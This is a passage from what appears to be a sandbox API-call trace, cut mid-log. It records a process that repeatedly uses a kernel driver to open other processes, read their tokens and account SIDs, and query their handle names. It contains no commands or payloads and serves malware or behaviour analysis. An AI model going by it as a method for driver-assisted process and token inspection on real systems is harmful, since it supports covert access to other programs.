DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0154.499] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x14 [0154.499] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80019db300 | out: TokenHandle=0xfffffa80019db300*=0xc4) returned 0x0 [0154.499] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0154.499] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.499] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0154.499] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0155.027] CloseHandle (hObject=0xc4) returned 1 [0155.027] CloseHandle (hObject=0xc8) returned 1 [0155.027] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.027] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0155.027] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.027] PsAcquireProcessExitSynchronization () returned 0x0 [0155.027] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880051635d0) [0155.027] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800203ddd0, HandleInformation=0x0) returned 0x0 [0155.027] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.027] PsReleaseProcessExitSynchronization () returned 0x2 [0155.028] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0155.028] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a02c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a02c4, ReturnLength=0xfffff88005163508) returned 0x0 [0155.028] ObfDereferenceObject (Object=0xfffffa800203ddd0) returned 0x1 [0155.028] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.028] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.028] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.028] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0155.028] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.028] PsAcquireProcessExitSynchronization () returned 0x0 [0155.028] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880051635d0) [0155.028] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800203d9d0, HandleInformation=0x0) returned 0x0 [0155.028] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.028] PsReleaseProcessExitSynchronization () returned 0x2 [0155.029] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0155.029] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.029] ObfDereferenceObject (Object=0xfffffa800203d9d0) returned 0x1 [0155.029] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.029] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.029] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.029] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0155.029] PsLookupProcessByProcessId (in: ProcessId=0x5d4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.029] PsAcquireProcessExitSynchronization () returned 0x0 [0155.029] KeStackAttachProcess (in: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002038b30, ApcState=0xfffff880051635d0) [0155.029] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0155.029] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.029] PsReleaseProcessExitSynchronization () returned 0x2 [0155.030] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x12 [0155.030] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030b1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030b1044, ReturnLength=0xfffff88005163550) returned 0x0 [0155.030] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0155.030] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.030] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0xc8 [0155.030] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0155.030] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002046060, HandleInformation=0x0) returned 0x0 [0155.030] ObOpenObjectByPointer (in: Object=0xfffffa8002046060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0155.031] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x14 [0155.031] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0155.031] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0155.031] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.031] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0155.031] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0155.034] CloseHandle (hObject=0xc4) returned 1 [0155.034] CloseHandle (hObject=0xc8) returned 1 [0155.034] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.034] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0155.034] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.034] PsAcquireProcessExitSynchronization () returned 0x0 [0155.035] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880051635d0) [0155.035] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800204c810, HandleInformation=0x0) returned 0x0 [0155.035] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.035] PsReleaseProcessExitSynchronization () returned 0x2 [0155.035] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0155.035] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ac044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ac044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.035] ObfDereferenceObject (Object=0xfffffa800204c810) returned 0x1 [0155.035] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.035] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.035] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.035] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0155.036] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.036] PsAcquireProcessExitSynchronization () returned 0x0 [0155.036] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880051635d0) [0155.036] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020507e0, HandleInformation=0x0) returned 0x0 [0155.047] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.047] PsReleaseProcessExitSynchronization () returned 0x2 [0155.047] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0155.047] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.047] ObfDereferenceObject (Object=0xfffffa80020507e0) returned 0x1 [0155.047] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.047] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.047] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.047] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0155.047] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.047] PsAcquireProcessExitSynchronization () returned 0x0 [0155.047] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880051635d0) [0155.047] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0155.047] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.047] PsReleaseProcessExitSynchronization () returned 0x2 [0155.047] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0155.047] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163550) returned 0x0 [0155.047] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0155.047] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.048] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x51c) returned 0xc8 [0155.048] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0155.048] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800205e5f0, HandleInformation=0x0) returned 0x0 [0155.048] ObOpenObjectByPointer (in: Object=0xfffffa800205e5f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0155.048] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x14 [0155.048] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0155.048] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0155.048] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.048] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0155.048] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0155.051] CloseHandle (hObject=0xc4) returned 1 [0155.051] CloseHandle (hObject=0xc8) returned 1 [0155.051] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.051] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0155.051] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.051] PsAcquireProcessExitSynchronization () returned 0x0 [0155.051] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880051635d0) [0155.051] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002063f20, HandleInformation=0x0) returned 0x0 [0155.052] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.052] PsReleaseProcessExitSynchronization () returned 0x2 [0155.052] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0155.052] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.052] ObfDereferenceObject (Object=0xfffffa8002063f20) returned 0x1 [0155.052] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.052] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.052] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.052] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0155.052] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.052] PsAcquireProcessExitSynchronization () returned 0x0 [0155.052] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880051635d0) [0155.052] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002063990, HandleInformation=0x0) returned 0x0 [0155.053] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.053] PsReleaseProcessExitSynchronization () returned 0x2 [0155.053] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0155.053] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.053] ObfDereferenceObject (Object=0xfffffa8002063990) returned 0x1 [0155.053] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.053] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.053] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.053] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0155.053] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.053] PsAcquireProcessExitSynchronization () returned 0x0 [0155.053] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880051635d0) [0155.053] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0155.053] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.054] PsReleaseProcessExitSynchronization () returned 0x2 [0155.054] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0155.054] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ee5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ee5044, ReturnLength=0xfffff88005163550) returned 0x0 [0155.054] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0155.054] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.054] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xc8 [0155.054] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0155.054] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002084b30, HandleInformation=0x0) returned 0x0 [0155.054] ObOpenObjectByPointer (in: Object=0xfffffa8002084b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0155.055] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x14 [0155.055] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0155.055] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0155.055] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.055] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0155.055] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0155.058] CloseHandle (hObject=0xc4) returned 1 [0155.058] CloseHandle (hObject=0xc8) returned 1 [0155.058] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.058] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0155.058] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.058] PsAcquireProcessExitSynchronization () returned 0x0 [0155.058] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880051635d0) [0155.058] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800204c960, HandleInformation=0x0) returned 0x0 [0155.059] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.059] PsReleaseProcessExitSynchronization () returned 0x2 [0155.059] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0155.059] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b5044, ReturnLength=0xfffff88005163508) returned 0x0 [0155.059] ObfDereferenceObject (Object=0xfffffa800204c960) returned 0x1 [0155.059] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0155.059] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0155.059] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0155.059] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0155.059] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0155.059] PsAcquireProcessExitSynchronization () returned 0x0 [0155.060] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880051635d0) [0155.060] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002082400, HandleInformation=0x0) returned 0x0 [0155.060] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0155.060] PsReleaseProcessExitSynchronization () returned 0x2 [0155.060] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0155.060] ObQueryNameString (in: Object=0xfffffa8002828cd0, 